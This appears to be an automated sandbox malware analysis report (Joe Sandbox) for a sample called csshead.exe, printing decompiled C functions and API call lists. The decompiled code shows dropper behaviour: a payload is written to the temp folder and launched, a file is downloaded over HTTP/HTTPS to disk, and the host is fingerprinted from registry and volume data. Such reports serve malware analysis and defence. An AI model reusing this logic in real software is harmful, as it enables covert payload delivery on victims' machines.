    				intOrPtr _t58;
    				intOrPtr _t63;
    				intOrPtr _t67;
    				intOrPtr _t78;
    
    				_t36 = __eax -  *__eax;
    				 *_t36 =  *_t36 + _t36;
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = _t36;
    				_v20 = 0;
    				_v24 = E00407CFC(_v12);
    				E00401258( &_v1124, 0x44);
    				_v1124.cb = 0x44;
    				if(_v24 == 0) {
    					_t42 =  *0x40a168; // 0x401dec
    					E00407290(_t42);
    				} else {
    					_v28 = E00401110(_v8, 0x408494);
    					_t102 = _v28;
    					if(_v28 != 0) {
    						GetTempPathA(0x201,  &_v1054);
    						E00407560( &_v1054, 0x408494, _t102);
    						E00401308( &_v541, 0x40849c);
    						E0040133C( &_v541,  &_v1054);
    						E0040133C( &_v541, 0x40849c);
    						_t58 =  *0x40a0a8; // 0x401c4c
    						E0040133C( &_v541, _t58);
    						if( *((char*)(_v28 + 4)) != 0x31) {
    							 *0x40b514 = 0;
    							_t63 =  *0x40b510; // 0x0
    							E00401828(_t63);
    							E004013B4(0x40b510, _v16);
    							_t67 =  *0x40b510; // 0x0
    							E004012B8(_t67, _v16, _v12);
    							 *0x40b514 = _v16;
    							 *0x40be1c = 0;
    							wsprintfA("1530474054", 0x4084a0, _v24);
    						} else {
    							E0040485C( &_v1054, _v16, _v12);
    							Sleep(0x5dc);
    							if(CreateProcessA(0,  &_v541, 0, 0, 0, 0, 0, 0,  &_v1124,  &_v1140) == 0) {
    								_t78 =  *0x40a174; // 0x401e10
    								E00407290(_t78);
    							} else {
    								_v20 = 0xffffffff;
    							}
    						}
    					}
    				}
    				return _v20;
    			}

    APIs
      • Part of subcall function 00407290: CreateThread.KERNEL32(00000000,00000000,Function_00007278,?,00000000,?), ref: 004072AC
      • Part of subcall function 00407290: CloseHandle.KERNEL32(?), ref: 004072B9
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
      • Part of subcall function 004013B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD
    • GetTempPathA.KERNEL32(00000201,?), ref: 00408364
    • wsprintfA.USER32 ref: 00408476
      • Part of subcall function 0040485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404886
      • Part of subcall function 0040485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004048A7
      • Part of subcall function 0040485C: FlushFileBuffers.KERNEL32(000000FF), ref: 004048C4
      • Part of subcall function 0040485C: CloseHandle.KERNEL32(000000FF), ref: 004048CE
    • Sleep.KERNEL32(000005DC), ref: 004083E3
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040840C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • RtlDecodePointer.NTDLL(0044204C), ref: 00425D92
    • TlsFree.KERNEL32(00442050,00426218,?,00424C8B), ref: 00425DAC
    • RtlDeleteCriticalSection.NTDLL(00000000), ref: 0042BF78
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    • RtlDeleteCriticalSection.NTDLL(00442050), ref: 0042BFA2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E0040485C(CHAR* __eax, long __ecx, void* __edx) {
    				CHAR* _v8;
    				void* _v12;
    				long _v16;
    				intOrPtr _v20;
    				void* _v24;
    				long _v28;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_v20 = 0;
    				_v24 = CreateFileA(_v8, 0x40000000, 0, 0, 2, 0x80, 0);
    				if(_v24 != 0xffffffff) {
    					if(WriteFile(_v24, _v12, _v16,  &_v28, 0) != 0 && _v28 == _v16) {
    						_v20 = 0xffffffff;
    					}
    					FlushFileBuffers(_v24);
    					CloseHandle(_v24);
    				}
    				return _v20;
    			}

    APIs
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404886
    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004048A7
    • FlushFileBuffers.KERNEL32(000000FF), ref: 004048C4
    • CloseHandle.KERNEL32(000000FF), ref: 004048CE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • LoadLibraryA.KERNEL32(?), ref: 00410AE6
    • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00410B11
    • FreeLibrary.KERNEL32(00000000), ref: 00410B21
    • FreeLibrary.KERNEL32(00000000), ref: 00410B32
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetProcAddress.KERNEL32(?,CloseThemeData), ref: 00411BD3
    • GetProcAddress.KERNEL32(?,OpenThemeData), ref: 00411BF8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • __getptd.LIBCMT ref: 0042581D
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
      • Part of subcall function 00425504: __getptd.LIBCMT ref: 00425510
      • Part of subcall function 00425504: __amsg_exit.LIBCMT ref: 00425530
      • Part of subcall function 00425504: InterlockedDecrement.KERNEL32(?), ref: 0042555D
      • Part of subcall function 00425504: InterlockedIncrement.KERNEL32(00441D00), ref: 00425588
      • Part of subcall function 004255A8: GetOEMCP.KERNEL32(00000000), ref: 004255D1
      • Part of subcall function 004255A8: GetACP.KERNEL32(00000000), ref: 004255F4
      • Part of subcall function 0042A0DF: Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100
    • InterlockedDecrement.KERNEL32(?), ref: 00425883
    • InterlockedIncrement.KERNEL32(00000000), ref: 004258A8
      • Part of subcall function 0042C08B: __amsg_exit.LIBCMT ref: 0042C0AD
      • Part of subcall function 0042C08B: RtlEnterCriticalSection.NTDLL(?), ref: 0042C0B5
    • InterlockedDecrement.KERNEL32 ref: 0042593A
    • InterlockedIncrement.KERNEL32(00000000), ref: 0042595E
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 00414300: GetVersionExA.KERNEL32(?), ref: 00414333
      • Part of subcall function 00414300: SystemParametersInfoA.USER32(00000029,00000158,?,00000000), ref: 00414376
      • Part of subcall function 00414300: GetObjectA.GDI32(?,0000003C,?), ref: 004143AA
      • Part of subcall function 00414300: lstrcmp.KERNEL32(?,?), ref: 00414476
      • Part of subcall function 00414300: CreateFontIndirectA.GDI32(?), ref: 00414488
      • Part of subcall function 00414300: DeleteObject.GDI32(?), ref: 004144A9
      • Part of subcall function 00414300: DeleteObject.GDI32(?), ref: 004144C4
      • Part of subcall function 00414300: SendMessageA.USER32(?,00000030,00000000,00000001), ref: 004144DB
      • Part of subcall function 00414300: SendMessageA.USER32(?,0000041C,00000000,00436330), ref: 004144EC
      • Part of subcall function 00414300: SendMessageA.USER32(?,00000421,00000000,00000000), ref: 004144F9
      • Part of subcall function 00414300: SelectObject.GDI32(00000000,?), ref: 00414519
      • Part of subcall function 00414300: DrawTextA.USER32(00000000,0043632C,000000FF,?,00000424), ref: 00414541
      • Part of subcall function 00414300: SetRectEmpty.USER32(?), ref: 00414559
      • Part of subcall function 00414300: DrawTextA.USER32(00000000,00436328,000000FF,?,00000424), ref: 00414571
      • Part of subcall function 00414300: SelectObject.GDI32(00000000,00000000), ref: 00414593
      • Part of subcall function 00414300: GetVersionExA.KERNEL32(?), ref: 004145C6
      • Part of subcall function 00414300: SystemParametersInfoA.USER32 ref: 004145EE
      • Part of subcall function 00414300: SystemParametersInfoA.USER32(00001022,00000000,?,00000000), ref: 0041465D
      • Part of subcall function 00414300: GetVersionExA.KERNEL32(?), ref: 004146A8
    • GetVersionExA.KERNEL32(?,00000090), ref: 004159B5
    • SystemParametersInfoA.USER32(00000029,00000158,?,00000000), ref: 004159FA
    • GetSystemMetrics.USER32(00000031), ref: 00415A10
    • GetSystemMetrics.USER32(00000032), ref: 00415A1A
    • GetClientRect.USER32 ref: 00415AB9
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • SendMessageA.USER32(?,00000401,?,0000FFFF), ref: 0041E612
    • SendMessageA.USER32(?,00000402,?,00000000), ref: 0041E626
    • SendMessageA.USER32(?,00000405,?), ref: 0041E63A
    • SendMessageA.USER32(?,00000403,?), ref: 0041E64E
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 0041E6A9
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetWindowRect.USER32(?,?), ref: 00411FAE
      • Part of subcall function 004112B0: SetRect.USER32(?,?,?,?,?), ref: 00411304
      • Part of subcall function 004112B0: SetRect.USER32(00000000,?,?,?,?), ref: 00411320
      • Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 004113E3
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 00411412
    • PtInRect.USER32(?), ref: 00412035
    • GetSystemMenu.USER32(?,00000000), ref: 0041204A
    • GetMenuDefaultItem.USER32(00000000,00000000,00000000), ref: 00412055
    • SendMessageA.USER32(?,00000112,00000000,00000000), ref: 00412074
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • RtlEnterCriticalSection.NTDLL(00442A20), ref: 0041F12F
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F156
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F16C
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F189
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,00000000,00421BE3,00000000,?,?,?,?,?,?,00000000,00000404), ref: 0041F1A2
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • __CreateFrameInfo.LIBCMT ref: 0042A553
      • Part of subcall function 004241AB: __getptd.LIBCMT ref: 004241B9
      • Part of subcall function 004241AB: __getptd.LIBCMT ref: 004241C7
    • __getptd.LIBCMT ref: 0042A55D
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
    • __getptd.LIBCMT ref: 0042A56B
    • __getptd.LIBCMT ref: 0042A579
    • __getptd.LIBCMT ref: 0042A584
      • Part of subcall function 00424250: __CallSettingFrame@12.LIBVCRUNTIME ref: 0042429C
      • Part of subcall function 0042A651: __getptd.LIBCMT ref: 0042A660
      • Part of subcall function 0042A651: __getptd.LIBCMT ref: 0042A66E
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 00425D30: TlsGetValue.KERNEL32(00000000,00425E89,?,?,00417F96,00000009), ref: 00425D39
      • Part of subcall function 00425D30: RtlDecodePointer.NTDLL ref: 00425D4B
      • Part of subcall function 00425D30: TlsSetValue.KERNEL32(00000000,?,?,00417F96,00000009), ref: 00425D5A
      • Part of subcall function 00425F05: InterlockedDecrement.KERNEL32(?), ref: 00425FA3
      • Part of subcall function 00423C10: __getptd.LIBCMT ref: 00423C1C
      • Part of subcall function 00423C10: __XcptFilter.LIBCMT ref: 00423C3D
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    • ___fls_getvalue@4.LIBCMT ref: 00423C62
      • Part of subcall function 00425D10: TlsGetValue.KERNEL32(?,?,00423C67,00000000), ref: 00425D1E
    • ___fls_setvalue@8.LIBCMT ref: 00423C75
      • Part of subcall function 00425D64: RtlDecodePointer.NTDLL(?), ref: 00425D75
    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00423C7E
    • RtlExitUserThread.NTDLL(00000000), ref: 00423C85
    • GetCurrentThreadId.KERNEL32 ref: 00423C8B
    • __getptd.LIBCMT ref: 00423CF4
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
      • Part of subcall function 00425DBE: GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043CE18,00000008,00425EC6,00000000,00000000,?,?,00417F96,00000009), ref: 00425DCF
      • Part of subcall function 00425DBE: InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10
    • CreateThread.KERNEL32(?,?,00423C51,00000000,?,?), ref: 00423D2B
    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00423D35
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • BeginPaint.USER32 ref: 0041E12D
    • lstrlen.KERNEL32(?), ref: 0041E141
    • lstrlen.KERNEL32(?), ref: 0041E149
    • TextOutA.GDI32(?,0000000A,0000000A,?,00000000), ref: 0041E156
    • EndPaint.USER32(?,00000000), ref: 0041E166
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 98%
    			E00403C26(intOrPtr __eax, void* __ecx, CHAR* __edx) {
    				intOrPtr _v8;
    				CHAR* _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				long _v32;
    				char _v36;
    				char _v40;
    				intOrPtr _v44;
    				long _v48;
    				void* _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				signed char _v68;
    				signed int _v72;
    				char _v201;
    				char _v458;
    				void _v1483;
    				signed int _t88;
    				intOrPtr _t93;
    				void* _t94;
    				intOrPtr _t162;
    				intOrPtr _t165;
    				void* _t176;
    				void* _t178;
    				void* _t185;
    
    				_t176 = _t178;
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = 0;
    				_t181 =  *0x40b7a4;
    				if( *0x40b7a4 == 0) {
    					E00403A04(_t181);
    				}
    				_t162 =  *0x40a1a4; // 0x401ec0
    				_t88 = E00401110(_v8, _t162);
    				asm("sbb eax, eax");
    				_v68 =  ~(_t88 & 0xffffff00 | _t88 == _v8);
    				_v56 = E00401110(_v8, E00403E98);
    				if(_v56 != 0) {
    					_v56 = _v56 + 2;
    					_v60 = E00401110(_v56, 0x403e9c);
    					_v32 = _v60 - _v56;
    					E004012B8( &_v201, _v32, _v56);
    					 *((char*)(_t176 + _v32 - 0xc5)) = 0;
    					E00401308( &_v458, _v60);
    				}
    				_t93 =  *0x40a298; // 0x0
    				_t94 = _t93 - 1;
    				_t185 = _t94;
    				if(_t185 < 0) {
    					_v64 = 0;
    				} else {
    					if(_t185 == 0) {
    						_v64 = 0;
    					} else {
    						if(_t94 == 1) {
    							_v64 = 1;
    						}
    					}
    				}
    				_v20 = E00403864(0x40b7a4, _v64, 0, 0, 0);
    				if(_v68 == 0) {
    					_v72 = 0x50;
    				} else {
    					_v72 = 0x1bb;
    				}
    				_v24 = E0040161C(_v20, _v72,  &_v201, 0, 0, 3, 0, 0);
    				if(_v68 == 0) {
    					_v72 = 0x4400000;
    				} else {
    					_v72 = 0x4c03000;
    				}
    				_t165 =  *0x40a244; // 0x4020b8
    				_v28 = E00401660(_v24,  &_v458, _t165, 0, _v72, 0, 0, 0);
    				if(_v68 != 0) {
    					_v32 = 4;
    					E004016D8(_v28,  &_v72, 0x1f,  &_v32);
    					_v72 = _v72 | 0x00000100;
    					E0040170C(_v28,  &_v72, 0x1f, 4);
    				}
    				E004015E4(_v28, 0, 0, 0, 0);
    				_v32 = 4;
    				_v36 = 0;
    				_v40 = 0;
    				E004039CC(_v28,  &_v36, 0x20000013,  &_v40,  &_v32);
    				if(_v36 != 0xc8) {
    					L25:
    					E0040151C(_v28);
    					E0040151C(_v24);
    					E0040151C(_v20);
    					return _v16;
    				} else {
    					_v52 = CreateFileA(_v12, 0x40000000, 0, 0, 2, 0x80, 0);
    					if(_v52 == 0xffffffff) {
    						goto L25;
    					} else {
    						goto L22;
    					}
    					do {
    						L22:
    						_v44 = E004016A4(_v28, 0,  &_v32, 0);
    						E004015B0(_v28, 0x401,  &_v1483,  &_v32);
    						WriteFile(_v52,  &_v1483, _v32,  &_v48, 0);
    					} while (_v32 != 0 || _v44 == 0);
    					CloseHandle(_v52);
    					_v16 = 0xffffffff;
    					goto L25;
    				}
    			}

    APIs
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00403E08
    • WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 00403E55
    • CloseHandle.KERNEL32(000000FF), ref: 00403E6B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E00404BA0(intOrPtr* __eax) {
    				intOrPtr* _v8;
    				long _v12;
    				long _v16;
    				signed int _v20;
    				long _v24;
    				long _v28;
    				signed int _v32;
    				void* _v36;
    				void* _v40;
    				signed int _v41;
    				char _v298;
    				char* _t78;
    				intOrPtr _t82;
    				intOrPtr _t87;
    				intOrPtr _t92;
    				intOrPtr _t98;
    				CHAR* _t109;
    
    				_v8 = __eax;
    				_v16 = 0;
    				_v12 = 0x101;
    				if(GetComputerNameA( &_v298,  &_v12) != 0) {
    					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
    				}
    				_t78 =  *0x40a25c; // 0x402174
    				RegOpenKeyExA(0x80000002, _t78, 0, 0x20119,  &_v36);
    				_v12 = 0x101;
    				_t82 =  *0x40a0e4; // 0x401d14
    				if(E004038B0(_v36, _t82, 0, 0,  &_v298,  &_v12) == 0) {
    					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
    				}
    				_v12 = 0x101;
    				_t87 =  *0x40a0e8; // 0x401d20
    				if(E004038B0(_v36, _t87, 0, 0,  &_v298,  &_v12) == 0) {
    					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
    				}
    				_v12 = 0x101;
    				_t92 =  *0x40a0ec; // 0x401d2c
    				if(E004038B0(_v36, _t92, 0, 0,  &_v298,  &_v12) == 0) {
    					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
    				}
    				_v12 = 4;
    				_v20 = 0;
    				_t98 =  *0x40a0f0; // 0x401d3c
    				E004038B0(_v36, _t98, 0, 0,  &_v20,  &_v12);
    				E00403890(_v36);
    				_v12 = 0;
    				_v28 = 0;
    				_v24 = 0;
    				_t109 =  *0x40a268; // 0x4021d0
    				GetVolumeInformationA(_t109, 0, 0,  &_v28,  &_v12,  &_v24, 0, 0);
    				_v32 = _v20 ^ _v28 ^ _v24;
    				E00401164(_v32,  &_v298);
    				E00401308(_v8,  &_v298);
    				E00401164(_v16,  &_v298);
    				E0040133C(_v8,  &_v298);
    				_v40 = _v8;
    				_v41 = 0;
    				while( *_v40 != 0) {
    					_v41 = _v41 ^ E0040118C( *_v40);
    					_v40 = _v40 + 2;
    				}
    				E00401164(_v41,  &_v298);
    				return E0040133C(_v8,  &(( &_v298)[6]));
    			}

    APIs
    • GetComputerNameA.KERNEL32(?,00000101), ref: 00404BC3
    • RegOpenKeyExA.ADVAPI32(80000002,00402174,00000000,00020119,?), ref: 00404C01
      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
    • GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,?,?,?,00000000,00000000), ref: 00404D40
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E00404B9B(intOrPtr* __eax, void* __edx, intOrPtr _a122) {
    				intOrPtr* _v8;
    				long _v12;
    				long _v16;
    				signed int _v20;
    				long _v24;
    				long _v28;
    				signed int _v32;
    				void* _v36;
    				void* _v40;
    				signed int _v41;
    				char _v298;
    				char* _t80;
    				intOrPtr _t84;
    				intOrPtr _t89;
    				intOrPtr _t94;
    				intOrPtr _t100;
    				CHAR* _t111;
    
    				_a122 = _a122 + __edx;
    				 *__eax =  *__eax + __eax;
    				_v8 = __eax;
    				_v16 = 0;
    				_v12 = 0x101;
    				if(GetComputerNameA( &_v298,  &_v12) != 0) {
    					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
    				}
    				_t80 =  *0x40a25c; // 0x402174
    				RegOpenKeyExA(0x80000002, _t80, 0, 0x20119,  &_v36);
    				_v12 = 0x101;
    				_t84 =  *0x40a0e4; // 0x401d14
    				if(E004038B0(_v36, _t84, 0, 0,  &_v298,  &_v12) == 0) {
    					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
    				}
    				_v12 = 0x101;
    				_t89 =  *0x40a0e8; // 0x401d20
    				if(E004038B0(_v36, _t89, 0, 0,  &_v298,  &_v12) == 0) {
    					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
    				}
    				_v12 = 0x101;
    				_t94 =  *0x40a0ec; // 0x401d2c
    				if(E004038B0(_v36, _t94, 0, 0,  &_v298,  &_v12) == 0) {
    					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
    				}
    				_v12 = 4;
    				_v20 = 0;
    				_t100 =  *0x40a0f0; // 0x401d3c
    				E004038B0(_v36, _t100, 0, 0,  &_v20,  &_v12);
    				E00403890(_v36);
    				_v12 = 0;
    				_v28 = 0;
    				_v24 = 0;
    				_t111 =  *0x40a268; // 0x4021d0
    				GetVolumeInformationA(_t111, 0, 0,  &_v28,  &_v12,  &_v24, 0, 0);
    				_v32 = _v20 ^ _v28 ^ _v24;
    				E00401164(_v32,  &_v298);
    				E00401308(_v8,  &_v298);
    				E00401164(_v16,  &_v298);
    				E0040133C(_v8,  &_v298);
    				_v40 = _v8;
    				_v41 = 0;
    				while( *_v40 != 0) {
    					_v41 = _v41 ^ E0040118C( *_v40);
    					_v40 = _v40 + 2;
    				}
    				E00401164(_v41,  &_v298);
    				return E0040133C(_v8,  &(( &_v298)[6]));
    			}

    APIs
    • GetComputerNameA.KERNEL32(?,00000101), ref: 00404BC3
    • RegOpenKeyExA.ADVAPI32(80000002,00402174,00000000,00020119,?), ref: 00404C01
      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
    • GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,?,?,?,00000000,00000000), ref: 00404D40
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • GetWindowLongA.USER32(00000000,000000FC), ref: 004118AF
      • Part of subcall function 00411030: CallWindowProcA.USER32(?,?,?,?,?), ref: 00411046
    • GetWindowLongA.USER32(00000000,000000FC), ref: 004118D7
    • SetWindowLongA.USER32(?,000000FC,?), ref: 004118E8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\csshead.exe,00000104), ref: 0042CD57
    • _parse_cmdline.LIBCMT ref: 0042CD82
      • Part of subcall function 0042A0DF: Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100
    • _parse_cmdline.LIBCMT ref: 0042CDC3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • MonitorFromPoint.USER32(?,?,00000000), ref: 00411928
    • MonitorFromPoint.USER32(?,?,00000002), ref: 00411932
    • GetMonitorInfoA.USER32 ref: 0041196C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E0040763C(CHAR* __eax) {
    				CHAR* _v8;
    				void* _v12;
    				long _v16;
    				intOrPtr _t12;
    				intOrPtr _t18;
    
    				_v8 = __eax;
    				_v12 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0);
    				if(_v12 == 0xffffffff) {
    					_t12 =  *0x40a248; // 0x4020bc
    					return E00407240(_t12, __eflags);
    				}
    				_v16 = GetFileSize(_v12, 0);
    				_t21 = _v16;
    				if(_v16 == 0) {
    					_t18 =  *0x40a248; // 0x4020bc
    					E00407240(_t18, _t21);
    				}
    				return CloseHandle(_v12);
    			}

    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407658
    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040766D
    • CloseHandle.KERNEL32(000000FF), ref: 0040768A
    Strings
    Memory Dump Source
